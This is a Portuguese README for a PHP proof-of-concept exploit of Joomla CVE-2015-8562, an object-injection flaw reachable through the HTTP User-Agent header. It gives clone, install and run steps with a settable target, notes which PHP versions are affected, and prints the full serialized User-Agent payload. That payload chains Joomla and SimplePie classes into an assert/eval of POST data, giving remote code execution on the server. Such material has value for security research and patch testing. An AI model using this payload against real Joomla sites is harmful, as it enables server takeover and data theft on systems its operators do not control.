
Uma prova de conceito para a vulnerabilidade CVE-2015-8562 do Joomla.
Um proof of concept para a vulnerabilidade CVE-2015-8562 do Joomla
Este PoC é uma cópia quase 1:1 da implementação em Python de Gary hospedada no exploit-db.
É muito fácil de instalar:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Depois que o composer tiver tudo instalado, você precisará alterar $target em exploit.php.
Depois disso, você está pronto para executar:
php exploit.php
Em dezembro de 2015, uma vulnerabilidade foi encontrada no Joomla. Ela permite que atacantes remotos realizem ataques de injeção de objetos PHP e executem código PHP arbitrário através do cabeçalho HTTP User-Agent.
Essa vulnerabilidade afetou todas as versões do Joomla. Um patch para v1.5.x, v2.5x e v3.x já foi lançado.
Se você estiver executando PHP >= 5.4.45, >= 5.5.29 ou >= 5.6.13, você está seguro, pois este exploit também utiliza CVE-2015-6835.
Nikos Verschore, da PatrolServer, fez um post no blog muito detalhado e foi de grande ajuda para entender essa vulnerabilidade. Você pode usar o mini-scanner gratuitamente para verificar se o seu site está em risco.
É assim que o cabeçalho User-Agent enviado se parece:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}